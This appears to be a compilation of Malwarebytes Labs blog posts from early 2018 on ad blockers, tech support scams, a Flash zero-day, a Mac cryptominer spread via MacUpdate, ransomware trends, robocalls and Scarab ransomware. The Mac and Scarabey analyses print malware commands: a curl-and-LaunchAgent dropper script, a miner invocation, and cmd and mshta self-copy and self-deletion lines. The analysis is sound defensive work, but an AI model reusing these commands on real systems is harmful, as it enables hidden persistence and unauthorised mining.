Feb 6, 2018
Comments Off on Safer Internet Day 2018: ad blockers and anti-trackers

Safer Internet Day 2018: ad blockers and anti-trackers

The path to a safer Internet can be a bit of a quandary. What programs should you buy? How long should your passwords be?  Is it okay to write them down? What makes a website secure?

All of these questions can merit their own lengthy essays, so today, on Safer Internet Day, we’re going to look at some of the simplest solutions for security. What is the easiest, fastest, completely free thing you can do to have a safer Internet experience? The answer: ad blockers and anti-tracking browser extensions. Let’s take a look at how.

Ad blockers

Some people feel that ad blockers are unethical, as they deprive others in the content chain of income. While this can be debated, it’s indisputable that cybercriminals love using ads as a malware delivery mechanism.

Traditionally, bad ads have delivered exploit kits, forced redirects, fake plugin updates, and more.  Recently, malicious ads have been caught running cryptominers, monopolizing your CPU to make the owners a few pennies. Given that you can’t be infected by an ad that doesn’t load, you might want to check out one of the following ad blockers.

Ublock origin (Chrome, Firefox, Safari, Edge)

Is simply blocking most ads not good enough for you? Does the idea of “acceptable ads” seem like a contradiction? Ublock origin might be for you. Most ad blockers are designed for the casual user, eschewing features in favor of keeping a low barrier to entry. Ublock origin is motivated by giving maximum power to the user to determine what content they wish to see, with block granularity down to individual ads on a single site. Ublock used to lose points for being a little tough to get going, but they’ve improved their interface to give a simplified dashboard of the nastiness they’re blocking, as well as a much more defined view if you’re so inclined.

Adblock (Chrome, Firefox, Safari, Edge, Android)

Adblock is one of the earlier blockers out there, and is relatively easy to set and forget. Depending on your block list subscriptions, it may not banish 100 percent of ads from your view, and occasionally struggles with YouTube pre-roll ads.

While its baseline functionality is perfectly serviceable, many privacy advocates take issue with Adblock’s policy on “acceptable ads.” Basically, if your ad meets certain criteria making it less annoying than most, Adblock will let it through. This is something that can be switched off if you’d prefer, but blocking advocates tend to be irritated by the need to go menu diving for what they view as a core function of any blocker—blocking ads.

1blocker (iOS)

Mobile ads, even when not malicious, are some of the worst out there. We’ve observed tech support scams, forced redirects to PUP downloads, and lock screens on the rise for all mobile platforms. 1blocker’s free version will give you back control of what code runs on your iPhone, and in some instances will reduce load on your battery as well.


When you visit a website, part of its content will be delivered by domains separate from the one you actually clicked on. Some of these domains have trackers that send information about your browsing habits to third parties, often for the purpose of serving up ads. Not only can it feel like a violation of privacy, but it can also result in longer load times and wasted bandwidth.

This is a little harder to understand in terms of safety. Aren’t all those people up in arms over privacy concerns being a little paranoid? The threat here is not that Google AdWords is going to take your aggregated data and use it to come club you over the head. A more realistic threat is that AdWords and other poorly vetted (that is to say—all of them) ad networks are accumulating data at a scale that is impossible to moderate, police, or secure.

Given that third parties have had a pretty awful track record at protecting customer data stores at scale, perhaps we should let them have less of it. Anti-tracking browser extensions like Ghostery and the EFF’s Privacy Badger are easy to install, and give you back some measure of control over who is holding onto data about your Internet use.

How do these services keep me safe?

At its core, safety is not a product or service; safety is a collection of behaviors.  While we referred to a handful of products above, they’re really just tools in furtherance of an important behavior—keeping control of what data goes out, and what code goes into your system.

Keeping a vigilant eye on both processes can go a long way towards staying safe online without spending a lot of money. To learn a little more about common online threats, check out our post on bad ads here, and our post on avoiding scams here.

Stay safe, everyone!

The post Safer Internet Day 2018: ad blockers and anti-trackers appeared first on Malwarebytes Labs.

Powered by WPeMatico

Feb 6, 2018
Comments Off on Tech support scammers find new way to jam Google Chrome

Tech support scammers find new way to jam Google Chrome

During the past quarter we have noted an increase in fake browser alerts pushing tech support scams. Most of these campaigns come from malicious advertising but also via compromised web sites. Crooks are using all sorts of tricks to not only scare users but also to try and ‘lock’ their browsers.

One such technique involving the history.pushState API which we reported about on this blog has now been patched but still continues to be used. There are also the infamous pop-unders that can be used in such a way that users are stuck between various tabs.

In yet another twist, scammers are now abusing another API that achieves their intended goal of freezing the browser. By doing so they hope that users will panic and call the toll-free number for assistance. The following animation shows what a user may experience with Google Chrome’s latest version (64.0.3282.140).

Figure 1: What happens when you visit the booby-trapped page.

The code responsible for this is embedded within the main page, and slightly obfuscated:

Figure 2: The underlying code shown with functions such as ‘bomb_ch’ or ‘ch_jam’

The Blob constructor coupled with the window.navigator.msSaveOrOpenBlob method lets you save files locally and, as you may have guessed, is what is being abused here.

The ch_jam() function calls another function called bomb_ch(), and are both appropriately named for what they do. This in turn calls the download function that uses the aforementioned Blob constructor.

It happens too fast to see how it works, but you may be able to spot it with a powerful enough machine and if you try to close the tab early on. That code triggers a very large number of downloads in rapid fire, which causes the browser to become unresponsive within a few seconds, and unable to be closed via normal means.

Figure 3: Attempting to close the browser tab before it gets jammed reveals what is going on

The primary targets for this particular browser freeze are Google Chrome users on Windows. Other browsers will get their own landing pages, abusing other HTML APIs. Considering that Chrome has the most market share in the browser category, this is yet another example of the desire for threat actors to deploy new social engineering schemes.

Since most of these browser lockers are distributed via malvertising, an effective mitigation method is to use an ad-blocker. As a last resort, the Windows Task Manager will allow you to forcefully quit the offending browser processes. Malwarebytes users were already protected against the redirection mechanism used in this attack.

The post Tech support scammers find new way to jam Google Chrome appeared first on Malwarebytes Labs.

Powered by WPeMatico

Feb 5, 2018
Comments Off on New Flash Player zero-day comes inside Office document

New Flash Player zero-day comes inside Office document

A new Flash Player zero-day has been found in recent targeted attacks, as reported by KrCERT. The flaw, which exists in Flash Player and earlier versions, allows an attacker to remotely execute malicious code. On February 1, Adobe published a security advisory acknowledging this zero-day:

Adobe is aware of a report that an exploit for CVE-2018-4878 exists in the wild, and is being used in limited, targeted attacks against Windows users. These attacks leverage Office documents with embedded malicious Flash content distributed via email.

Threat actors used a decoy Microsoft Excel document to lure their intended target (some South Korea users) in order to infect them with a remote administration tool named ROKRAT. While not obvious at first, an ActiveX object has been embedded into the document and contains the Flash exploit. Highlighting cells reveals a small white rectangle that represents the embedded object:

Upon opening the spreadsheet, one of several South Korean websites will be contacted via a GET request containing the following three parameters:

  • a unique identifier
  • the Flash Player version
  • the Operating System version

This is an important step because it retrieves a key used to decrypt the malicious shell code.

By the time we had access to this sample, the websites hosting it were down, which proved to be a showstopper in the exploitation and payload. Malwarebytes detects the remote administration tool that was dropped, as well as blocks the sites known to have hosted the key and payload.

Adobe has said it will issue a patch for this zero-day sometime during the week of February 5. In the meantime, users are advised to disable or uninstall the Flash Player. We expect that this exploit will be used in larger scale attacks, including via malicious spam. We will keep you updated of any further developments.

Indicators of compromise


SWF exploit


The post New Flash Player zero-day comes inside Office document appeared first on Malwarebytes Labs.

Powered by WPeMatico

Feb 5, 2018
Comments Off on A week in security (January 29 – February 04)

A week in security (January 29 – February 04)

Last week on Labs, we looked into PUPs stealing and using mainstream logos of security and tech companies to further gain user trust, GandCrab and Scarab ransomware variants in the wild, and a new Mac malware called OSX.CreativeUpdater that can be distributed via MacUpdate. We also profiled robocalling and ransomware, particularly how ransomware was named the “It” malware of early- to mid-2017, and then began to fizzle like a dying firecracker at end of the year onwards.

Other news

Stay safe, everyone!

The post A week in security (January 29 – February 04) appeared first on Malwarebytes Labs.

Powered by WPeMatico

Feb 5, 2018
Comments Off on Boomerang spam bombs Malwarebytes forum—not a smart move

Boomerang spam bombs Malwarebytes forum—not a smart move

Tech support scammers are generally not the best and brightest. As such, they will occasionally post ads for their fake companies in the comment sections here or on the Malwarebytes forums. Last week, however, scammers struggled with configuring their spambots, resulting in spam bombs on the forum lasting roughly 72 hours, with a slow taper down for two more days.

Over six days, 246 spam accounts associated with this activity were banned. We wondered what threat actor group would exercise such phenomenally poor judgment, so we drilled down a bit into who these people are.

As it turns out, the majority of the spam was posted for a threat actor we were already familiar with: Boomerang Tech Solutions. Boomerang scams using an AV theme, so they need to use the Malwarebytes brand to appear properly comprehensive to victims. They will also look to legitimate AV customers for scam targeting. Over the past year, Boomerang has:

  • Posted ads to our forums
  • Posted ads to blog comment sections
  • Maintained Twitter accounts to direct traffic to their domains
  • Monitored the Facebook pages of various AV companies to find customers requesting tech support. They then targeted those customers with linked phone numbers, claiming to be the company in question.
  • Made outbound calls to victims as Malwarebytes, then subsequently deleted MBAM from victim systems

As you can imagine, this behavior has not endeared them to US-based merchant processors, leaving them with pay by check as the primary payment option. (More on why alternative payment options tend to be bad here.)


Our counterfraud team has observed the following Indicators of Compromise (IOCs) related to Boomerang activity:

Website Twitter handle
Antivirus-support-number[.]com @Malwrebytes ‏
Boomerangtechnologies[.]info @malwarebytes4 ‏
www.antivirustechnicalhelp[.]com @malwarebytes_ ‏
www.wisdomsquad[.]com @malwarebytetech ‏
www.seccurityexperts[.]com @quickencontact2 ‏
liveantivirushelp[.]com n/a
antivirusconsulting[.]com n/a


How Boomerang rips us off

When Boomerang first came on our radar about a year ago, we called them up to see precisely how victims are being targeted. As you can see in the video of our call below, there’s nothing at all original here. Boomerang tells us that we are bedeviled by “illegal connections” sending our data overseas. The only slightly unusual parts are the relatively high quality of their website (most of these guys struggle with HTML), and the phone rep who told us that Malwarebytes does not protect from “viruses coming from the Internet.” Check out the video to see the standard Boomerang pitch.

How to stay safe

First and foremost, be a little extra suspicious of any company that is resistant to accept payment with a credit card. If they can’t process credit payments easily, there’s probably a good (bad) reason why. If you’ve had a run-in with these or any other tech support scammer (on our site, forum, or anywhere else), you can find information on what to do next here.

Have you been contacted by someone claiming to be us or our representative? See how to evaluate those claims here. Lastly, if you’ve dealt with anyone from Boomerang yourself, post to the comments below to let others know your experience. Stay suspicious and stay safe.

The post Boomerang spam bombs Malwarebytes forum—not a smart move appeared first on Malwarebytes Labs.

Powered by WPeMatico

Feb 2, 2018
Comments Off on New Mac cryptominer distributed via a MacUpdate hack

New Mac cryptominer distributed via a MacUpdate hack

Early this morning, security researcher Arnaud Abbati of SentinelOne tweeted about new Mac malware being distributed via MacUpdate. This malware, which Abbati has named OSX.CreativeUpdate, is a new cryptocurrency miner, designed to sit in the background and use your computer’s CPU to mine the Monero currency.

The malware was spread via hack of the MacUpdate site, which was distributing maliciously-modified copies of the Firefox, OnyX, and Deeper applications. According to a statement posted in the comments for each of the affected apps on the MacUpdate website, this happened sometime on February 1.

Both OnyX and Deeper are products made by Titanium Software (titanium-software.fr), but the site was changed maliciously to point to download URLs at titaniumsoftware.org, a domain first registered on January 23, and whose ownership is obscured. The fake Firefox app was distributed from download-installer.cdn-mozilla.net. (Notice the domain ends in cdn-mozilla.net, which is definitely not the same as mozilla.net. This is a common scammer trick to make you think it’s coming from a legitimate site.)

The downloaded files are .dmg (disk image) files, and they look pretty convincing. In each case, the user is asked to drag the app into the Applications folder, as would the original, non-malicious .dmg files for those apps.

The applications themselves were, as Abbati indicated in his tweet, created by Platypus, a developer tool that makes full macOS applications from a variety of scripts, such as shell or Python scripts. This means the creation of these applications had a low bar for entry.

Once the application has been installed, when the user opens it, it will download and install the payload from public.adobecc.com (a legitimate site owned by Adobe). Then, it attempts to open a copy of the original app (referred to as a decoy app, because it is used to trick the user into thinking nothing’s wrong), which is included inside the malicious app.

However, this isn’t always successful. For example, the malicious OnyX app will run on Mac OS X 10.7 and up, but the decoy OnyX app requires macOS 10.13. This means that on any system between 10.7 and 10.12, the malware will run, but the decoy app won’t open to cover up the fact that something malicious is going on. In the case of the Deeper app, the hackers got even sloppier, including an OnyX app instead of a Deeper app as the decoy by mistake, making it fail similarly but for a more laughable reason.

The “script” file inside the app takes care of opening the decoy app, and then downloading and installing the malware.

open Deeper.app
if [ -f ~/Library/mdworker/mdworker ]; then
killall Deeperd
nohup curl -o ~/Library/mdworker.zip
 content_disposition=attachment && unzip -o ~/Library/mdworker.zip -d
 ~/Library && mkdir -p ~/Library/LaunchAgents && mv
 ~/Library/mdworker/MacOSupdate.plist ~/Library/LaunchAgents && sleep 300
 && launchctl load -w ~/Library/LaunchAgents/MacOSupdate.plist && rm -rf
 ~/Library/mdworker.zip && killall Deeperd &

For those who can’t read shell scripts, this code first attempts to open the decoy Deeper.app, which will fail since the wrong decoy was included by mistake. Next, if the malware is already installed, the malicious dropper process is killed, since installation is not necessary.

If the malware is not installed, it will download the malware and unzip it into the user’s Library folder, which is hidden in macOS by default, so most users wouldn’t even know anything had been added there. It also installs a malicious launch agent file named MacOSupdate.plist, which recurrently runs another script.

 launchctl unload -w ~/Library/LaunchAgents/MacOS.plist && rm
   -rf ~/Library/LaunchAgents/MacOS.plist && curl -o
   content_disposition=attachment && launchctl load -w
   ~/Library/LaunchAgents/MacOS.plist &&

When this launch agent runs, it downloads a new MacOS.plist file and installs it. Before doing so, it will remove the previous MacOS.plist file, presumably so it can be updated with new code. The version of this MacOS.plist file that we obtained did the real work.

sh -c ~/Library/mdworker/sysmdworker -user walker18@protonmail.ch -xmr

This loads a malicious sysmdworker process, passing in a couple arguments, one of which is an email address.

That sysmdworker process will then do the work of mining the Monero cryptocurrency, using a command-line tool called minergate-cli, and periodically connecting to minergate.com, passing in the above email address as the login.

There are multiple takeaways from this. First and foremost, never download software from any kind of “download aggregation” site (a site that acts like an unofficial Mac App Store to let you browse for software). Such sites have a long history of issues. In the case of MacUpdate, back in 2015 they were modifying other people’s software, wrapping it in their own adware-laden installer. This is no longer happening, but in 2016, MacUpdate was similarly used to distribute the OSX.Eleanor malware.

Instead, always download software directly from the developer’s site or from the Mac App Store. These are not guarantees, and can still get you infected with malware, adware, or scam software. But your odds are better. Be sure to check around to make sure the software is legitimate before downloading, but do not give full credence to ratings or reviews on third-party sites or the Mac App Store, as those can be faked.

Second, if you have downloaded a new application and it seems not to be functioning as expected—such as not opening at all when you double-click it—be suspicious. Consider scanning your computer with security software. Malwarebytes for Mac will detect this malware as OSX.CreativeUpdater.

Finally, be aware that the old adage that “Macs don’t get viruses,” which has never been true, is proven to be increasingly false. This is the third piece of Mac malware so far this year, following OSX.MaMi and OSX.CrossRAT. That doesn’t even consider the wide variety of adware and junk software out there. Do not let yourself believe that Macs don’t get infected, as that will make you more vulnerable.

The post New Mac cryptominer distributed via a MacUpdate hack appeared first on Malwarebytes Labs.

Powered by WPeMatico

Feb 2, 2018
Comments Off on Ransomware’s difficult second album

Ransomware’s difficult second album

The last year has seen all manner of cybercrime, from scams and social engineering to malvertising and malspam. What’s interesting is that so many “next-gen,” sophisticated malware mainstays like exploits have dropped in popularity, while other more traditional types such as spyware have shot up dramatically —to the tune of an 882 percent increase in UK detections.

Meanwhile, here’s ransomware pretty much falling off a cliff, dropping as low as a 10 percent infection rate in December 2017:

Ransomware drop

Click to enlarge

Why is everyone jumping on the “I used spyware perfectly fine in 2007, and now I will again” bandwagon? Why is ransomware stagnating and tailing off? What omnipresent entity is dancing away behind the scenes, tying connections together and ensuring today’s attack news is yesterday’s old newspapers?

One of the answers, for me anyway, is Bitcoin.

(Digital) money makes the world go round

For many people in security circles (both victims and researchers), the first time coming across any mention of Bitcoin was through the payment demanded by ransomware authors. I have far too many memories of victims asking me what on Earth a Bitcoin was as they stared at the ransom screen blinking out from their computers. Bitcoin quickly became the payment method of choice over and above the formerly more common “send us an iTunes card code or wire us some money” demands.

From there, the professional criminal community fully embraced Bitcoin as the payment method of choice. They started utilizing TOR onion links to further anonymize the transaction, and layered on lots of other tactics that frankly required scammers to include FAQs in multiple languages just to ensure victims knew what they had to do next.


Click to enlarge

Once the script kiddies and amateur hour developers saw the big players raking in Bitcoin cash, they decided they wanted some of the same. We then had lots of pieces of poorly designed, DIY ransomware. You couldn’t always guarantee files would be decrypted after payment, and often it was impossible to tell if this was done intentionally or by accident. Even some of the big names didn’t always do what they were supposed to do.

The weird thing about ransomware is that it relies on dishonest developers being, well, honest. If people are coughing up lots of money to get their files back and it isn’t happening, word of mouth and a rapid press response will ensure the law of diminishing returns kicks in. People will either get smart and back up their files or simply resign themselves to losing them. A nice little earner suddenly becomes a big pile of nothing. Or, to put it another way:

Get in the bin

For those wanting to ply their trade over a long time, this is, of course, not a good result.

The great ransomware fightback of 2017

Alongside bad developers and increased public visibility after some huge outbreaks 2017, advances in security tools have become better equipped to deal with ransomware threats. In addition, lots of standalone programs have been made by independent researchers to decrypt files. This increased awareness of ransomware prevention (backing up files, using security tools) alongside decreasing prices for file storage has really helped to defang the ransomware menace to some degree. It’s no longer the killer app it once was for scammers, and with a few precautions in place, it loses much of its power.

And then, at last, we come to the Bitcoins themselves. You don’t need me to tell you the price is simultaneously through the roof and in the toilet, on the kind of crazy rollercoaster ride you just can’t predict. Back in the days when they weren’t quite so highly valued, ransomware authors could afford to get away with asking for the odd coin or two. Now? Frankly, they’re taking a huge leap of faith that someone can summon up the cryptocash to get their files back.

There are many pieces of ransomware out there that can be controlled by Command & Control servers; new files can be downloaded as required, and, if needed, criminals can tweak values to more manageable figures. Trouble is, there’s no guarantee our malware-developing friend is sitting there monitoring the rise and fall and rise and rise and fall of Bitcoin. It’s also entirely possible they don’t really care if the coin value on display is a bit too much to pay, because another victim will be along in a minute.

As for the DIY/home-brew contingent? Everything may well be hardcoded into the file, with no way to alter it once it lurches into the wild. At that point, if they’re asking for four Bitcoins and the price triples overnight, there’s a good chance they won’t be getting any money out of it.

There are many other factors at play of course, but “we’re slowly strangling ourselves out of the market by asking for ridiculous amounts of money” is certainly a rather large warning sign.

Swings, roundabouts, and the path of least resistance

There is a cyclical nature to attacks. They tend to swing from stealth being the “in” thing, to overt displays of fireworks on your desktop, to covert action becoming the new (old) hotness, and so on. Back in the day, old-school adware vendors had their programs bundled alongside other spyware, and the desktop would be ablaze with pop-ups, pop-unders, sliders, extensions—you name it. The idea was to generate as many ad impressions as possible before the affiliate networks were shut down. A quick apology, “It’ll never happen again,” and sure enough, they’d be right back at it a few days later.

Once security tools and public awareness had reached a tipping point and big legal things started to happen, many vendors went broke or moved onto pastures new. Those that remained knew they had to go dark, and from about 2008 onward you started to see a lot less fireworks and a lot more invisible assassins. (Well, not see them, exactly, given they were invisible, but anyway.)

Stealthy malware and silent botnets clinging onto a PC as covertly as possible for as long as they could was the order of the day. Eventually, these methods, too, fell out of favour, and cybercriminals started to ramp up more visible scams in the form of the evergreen fake antivirus/tech support scams, and social engineering on social media portals.

We’re seeing a similar pattern now with ransomware. Ransomware catches plenty of victims out the gate, but not so much once everyone has wised up a little. If ransomware groups can’t even get their hands on Bitcoins by wandering into a victim’s home at 2am and loudly announcing the takeover of their PC, it’s surely a lot easier to jump on the cryptomining craze and return to the digital shadows.


Click to enlarge

The advantages to moving into stealth mode are obvious. First, there are no more splashy takeovers. Splashy takeovers don’t last long on PCs these days. Second, the movement to covertly mine for coins using the victim’s GPU horsepower—without them knowing about it—has potential for longer-term gains. That’s the theory, at least; in reality, many people will notice fans spinning up, or computers under higher load or just plain old not responding. Even so, a lot of those people may just pass it off as “one of those things my computer does.” It’s a trade off, and not likely to make more money than kicking the door in and screaming for free coins, but it’s definitely a lot sneakier.

Finally, it’s a lot less hassle to just throw some script on a website, as opposed build the ransomware, pay some developers, mess around with onion sites, write up long FAQs for the victims, maintain C&C servers, ensure the decryption of hijacked files actually works, and so on. And cybercriminals delivering any kind of attack have noticed.

As we said in our blog on the 2017 State of Malware report:

Alongside a sudden cryptocurrency craze, bad actors have started utilizing cryptomining tools for their own profit, using victim system resources in the process. This includes compromised websites serving drive-by mining code, a significant increase of miners through malicious spam and exploit kit drops, and adware bundlers pushing miners instead of toolbars. By the end of 2017, basically anyone doing any kind of cybercrime was also likely dabbling in cryptomining.

It isn’t just scripts mining for coins in the background of low traffic, unknown websites, either. In the last few days, we’ve also seen signs of Google’s DoubleClick ads on Youtube serving as the launchpad for Coinhive mining scripts. If you’re hunting around for websites for your kids, you may well run into mining scripts there, too. This kind of furtive mining is a bit of a fast moving plague, and throws the old arguments over blocking ads while hurting publishers to the foreground once more.

And while we’re talking about paths of least resistance, there are many other types of scams taking aim at digital coins; the sky is the limit, and bad actors don’t seem worried about locking themselves into the same old tried and tested methods.

Everywhere you look, digital currency is causing headaches across the board. Malware miners. Fake wallets in official mobile stores. Covert scripts quietly gobbling up power cycles in the background. Gamers unable to buy graphics cards due to miners hogging stock, resulting in shops selling them at a discount with gaming components. Even fake fonts are in on the act.

fake fonts

Click to enlarge

Ransomware: not dead yet

Ransomware may be losing its cool factor, but it’s definitely not dead and buried—not by a long shot. Many ransomware authors appear to be in bit of a self-imposed time out. Except these guys aren’t feeling guilty. It’s more like “let’s see what horrible new thing we can come up with next.”

There are already a few signs of desperate, scorched-earth ransomware attack methods, with the so-called “SpriteCoin” hurling malware at victims once they’ve paid to recover their files. Elsewhere, we have ransomware effectively trying to cannibalize each other’s payments. This infighting certainly isn’t a good thing for the victims, especially when their payments are ending up with the wrong malware groups—nobody is getting their files back in that scenario. Stack that alongside the “bad” ransomware not decrypting files, and you have yet another reason why people will, eventually, choose not to pay.

The future may or may not be Bitcoin, but for now, it almost certainly isn’t ransomware. Give it time while the battle to establish exactly what ransomware is about plays out behind the scenes, though. Eventually, the pendulum always swings back.

The post Ransomware’s difficult second album appeared first on Malwarebytes Labs.

Powered by WPeMatico

Feb 1, 2018
Comments Off on Stop telephoning me-eh-eh-eh-eh: robocalls explained

Stop telephoning me-eh-eh-eh-eh: robocalls explained

If you’ve ever answered a call from anyone outside your contact list only to hear a recorded message playing back at you, you have just been robocalled. Unfortunately for American consumers, this happens several times a day, seven days a week. Suffice to say, this is beyond annoying—and it’s getting worse.

In their National Robocall Index, YouMail, a telecommunications service provider, revealed that nearly 10 billion robocalls were made by mid-2016 and predicted a total of 30 billion by the end of that year. Furthermore, YouMail announced that American consumers received a total of 30.5 billion robocalls in 2017.

Are robocalls the same as cold calls?

What spam is to email, robocall is to telecommunications devices, such as home phones, mobile phones, and VoIP landlines. There is usually no real human behind a robocall, only an automated, pre-recorded message—as the name suggests, calls are made by computers. On the other hand, cold calls, warm calls, social calls, and a more personalized and targeted form of cold calling salespeople are referring to as “smart calls” all require a live person.

Many types of robocalls are legal, as are emails, SMS/MMS, and phone calls. Unfortunately, they can be abused, too. So how can you tell the good from the bad?

Which are the “good” robocalls?

An example of legitimate robocalls comes from political parties, especially during election season. Their goal is to sway voters to go to another party or solicit donations. They are legally approved by the FCC.

Other examples include robocalls that notify users of canceled flights or airline changes; doctor or dental appointment reminders; class cancellations or school emergencies; and credit card fraud alerts, among others. Robocalls that are made on behalf of non-profit organizations and charities exist as well. But take note: although several of these types are legal, most robocalls are illegal and fraudulent in nature.

Which are  the bad robocalls?

Illegal robocalls generally contact recipients with the intention of stealing something from them. And that something might be your contact number, your financial information, or even your identity.

Here’s a rule of thumb: If you receive a call you didn’t consent to or does not contain emergency or critical information, then the robocall can be considered illegal.

Take note of the list of purported sources of robocalls below. Robocalls that claim to come from these organizations certainly do not. You can be sure that they’re always, always a scam:

  • IRS
  • Social Security Services (SSS)
  • Department of Motor Vehicles (DMV)
  • Cruise companies
  • Tech support

A new trend in illegal robocalling involves the use of numbers closely resembling those they are contacting. Ailsa Chang, a correspondent for NPR’s Planet Money podcast, documented her experience with this when she received a call from a number with the same area code and first three digits of her own contact number. This is known as neighbor spoofing.

The psychology behind neighbor spoofing is that recipients are more likely to pick up the call should they see a familiar-looking number because they believe the caller might be someone they know, like a colleague or their child’s school.

In this underground, lucrative business, scammers have become more creative, thanks to technology that has made it easier for them to make unwanted calls and more challenging for us to accurately detect and block.

Are you familiar with email spoofing? Read this to learn more about it.

I just enrolled in the National Do Not Call Registry. I shouldn’t be getting those deceptive robocalls now, right?

While it is true that legal businesses doing robocalls honor the National Do Not Call Registry, your average cybercriminal and scammer does not. In fact, numbers in this registry are no longer immune to those annoying robocalls.

Back in 2003, when the registry was first passed, it had been successful in deterring legal businesses from sending out unwanted calls. But things have significantly changed since then. For one thing, the Internet has gained popularity and usage, and the resources needed to make innumerable and inexpensive calls are easy enough to come by. Furthermore, it’s known that majority of these illegal robocalls originate outside the United States, making them difficult (if not impossible) to stop.

I’ve seen YouTube clips of people messing with phone scammers. Can I do that with these robocallers?

We don’t advise it. In fact, both the Better Business Bureau (BBB) and the FCC highly encourage phone users to never answer calls from numbers you don’t have in your contact list, from anonymous callers, or from numbers you don’t recognize. Doing otherwise can only make matters worse, as robocallers could be flagging your number for activity. For them, getting any response from a number is a sure sign that it’s active. And an active number could be targeted again and again. That said, ignoring such calls is probably the less thrilling yet the best course of action to take.

So what else can we do to mitigate bad robocalls once and for all?

Below are steps one can take to nip robocalling in the bud:

  • Report the call to the FCC, Federal Trade Commission (FTC), and your attorney general. Doing so will help the collective efforts of regulators and phone companies in blocking these numbers.
  • Do not give out your number online or post it publicly in your social media profiles. They will likely be scraped by scammers.
  • Use efficient apps to analyze the kind of call you receive and respond to it accordingly. So far, Nomorobo is (one of) the best in the market, and it won the Robocall Challenge by the FTC several years ago. Other useful apps include Truecaller, YouMail, PrivacyStar, Hiya, and Mr. Number.
  • Go old-school by turning off your landline’s ringer and then feeding the call to an answering machine with a caller ID. You can always return the call if you have determined that the caller is using a legitimate number or has actually left a message worth returning.
  • If you happen to pick up a call from a robocaller, either by accident or just for the heck of it, hang up immediately or don’t answer any question thrown at you. It’s highly likely that it records your voice to use it to authorize the billing of stolen credit cards.
  • Take advantage of added security measures or protocols your voice service providers offer. Late last year, the FCC has passed a rule that gives phone companies the power to proactively block numbers that do not or cannot make outgoing calls.

At this time, there’s no one solution for the complicated problem of nasty robocalls; however, consumers can pay it forward, helping those who are less in the know to stave off robocallers who’d like to rob them blind.

The next time you receive an unwanted call, don’t just flare up. Shut them up for good.

Additional reading:

The post Stop telephoning me-eh-eh-eh-eh: robocalls explained appeared first on Malwarebytes Labs.

Powered by WPeMatico

Jan 31, 2018
Comments Off on Scarab ransomware: new variant changes tactics

Scarab ransomware: new variant changes tactics

The Scarab ransomware was discovered in June 2017. Since then, several variants have been created and discovered in the wild. The most popular or widespread versions were distributed via the Necurs botnet and initially written in Visual C compiled. However, after unpacking, we’ve found that another variant discovered in December 2017, called Scarabey, is distributed a little differently, with a different payload code as well.

Scarabey, like most ransomware, is designed to demand a Bitcoin payment from its victims after encrypting files on their systems. However, instead of being distributed via Necurs malspam like the original Scarab, Scarabey was found targeting Russian users and being distributed via RDP/manual dropping on servers and systems.

In addition, Scarabey seems to not be packed in any samples we have come across. The malicious code is written in Delphi without the C++ packaging that Scarab has and the content and language of the ransom notes are different for each.

SCARAB ORIGINAL: e8806738a575a6639e7c9aac882374ae
SCARABEY VARIANT: 9a02862ac95345359dfc3dcc93e3c10e

The ransom notes

As far as the victim is concerned, the main difference between Scarabey and other Scarab ransomware is the language of the ransom note and the scare tactic used in the encryption message.

In the Scarab sample, the ransom note is written in English, however, it reads as if you translated word-for-word a Russian text into English, without knowing proper English grammar or syntax. Scarabey, on the other hand, is written in Russian. What’s interesting is that when you throw the Scarabey note into Google translate, as I have done below, it contains the same grammatical errors as the Scarab note.

Scarab ransom note

Original Scarab message

Scarabey message, translated from Russian to English with Google translate

This is more proof that that the authors of Scarab are likely Russian speakers who had written the note in their native language and run it through a translator to be added into the Scarab code. It would then seem quite likely that, since they decided to target Russians. they released the Scarabey note in their native language to cover more victims.

Different threats

In the original Scarab versions, it warns: The longer the user waits, the more the price will go up.

For Scarabey, on the other hand, it tells users that for every day they wait, more and more files will be deleted, until there are no more files left for them to recover.

Essentially, the criminals are implying that they have copies of the unencrypted files to give back to the user, or that they have control of the victim computer to delete files. This is not true for a few reasons:

  1. Besides the fact that the volume of data transfer to send up every file on the victim’s computer is completely unreasonable, there is no network functionality for sending files to the malware authors to hold as ransom.
  2. There is no backdoor or remote access code in scarab or its variants, which makes the threat of deleting files on victim’s computer impossible.
  3. The decryption process, from our understanding, is that they will send you decryption software loaded with the unique key after the ransom is payed. Then you can run the software and decrypt your files. That being said, there is no way for them to limit what gets decrypted as it is done locally and offline.
  4. Nowhere in the malware’s code is there any section that deletes user’s files from the computer.

Specifically, in the message, you see the author implying that the code is initially decrypted server side, which is untrue:

“24 files are deleted every 24 hours. (we have copies of them)
If you do not run the decryption program within 72 hours, all the files on the computer are completely deleted, without the possibility of recovery.”

Then, the malware author gives the steps to decrypt, which reference the use of a decryption program sent to the victim after payment. A decryption software received after payment with your unique key will decrypt files locally:

“- After starting the decoder, the files are decoded within an hour.
– Decoders of other users are incompatible with your data, as each user
unique encryption key”

The conclusion here is that the deletion of files or the idea that the malware authors have access to delete files is purely a scare tactic used to urge users into sending money quickly.

Technical analysis

While comparing the code from Scarab to Scarabey, it became quite clear that this variant, although written in Russian and targeting Russian users, likely comes from the same authors of the original. Throughout the entire code, both variants of malware are almost byte-for-byte identical. In addition, the sub processes generated, the dropped files, the encryption method used, and the mutexes used are all identical between the original Scarab version and Scarabey. This is the reason we consider it a variant, rather than a new family.

The following image shows the output from the two malware variants. The only things that differ are the addresses of code and memory data references (highlighted in yellow and red).

Code analysis

The Scarabey variant is written in Delphi. First, it starts off by checking if it is the first time being run. It does this by checking if it has parameters passed in. If not, it checks to see if the following registry key has been set:


[First run check, registry key]

If not set (meaning it is the first time run), it checks that SEVNZ has not been created yet and executes cmd.exe to copy itself into temp roaming directory as sevnz.exe using:

cmd.exe /c copy /y C:UsersvirusLabDesktop9a02862ac95345359dfc3dcc93e3c10e.exe “C:UsersvirusLabAppDataRoamingsevnz.exe”

Then it spawns a process of itself with param ‘runas’ as it exits.

[verifies SEVNZ.EXE does not exist, copies self to SEVNZ.EXE. executes elf with ‘runas’ param]

Now the sub process takes over.

The code flow now enters the same function as before, and deletes SEVNZ and re-copies it. It skips over those initial sections because of the parameter passed in. It then executes the previously copied file sevnz.exe:


Then, it opens the process cmd.exe with command line…

“mshta.exe “javascript:o=new ActiveXObject(‘Scripting.FileSystemObject’);setInterval(function(){try{o.DeleteFile(‘9a02862ac95345359dfc3dcc93e3c10f.exe’);close()}catch(e){}},10);””

…which simply waits and deletes itself, since the process can’t delete while running.

Now onto the SEVNZ.exe process:

The process checks to see if it is currently running as sevnz.exe by trying to delete

If it fails, it now knows that it is currently running as sevnz.exe rather than the original executable. Once it passes this check, it uses mtsha.exe to execute Javascript, which will delay and add itself into the registry auto-run:

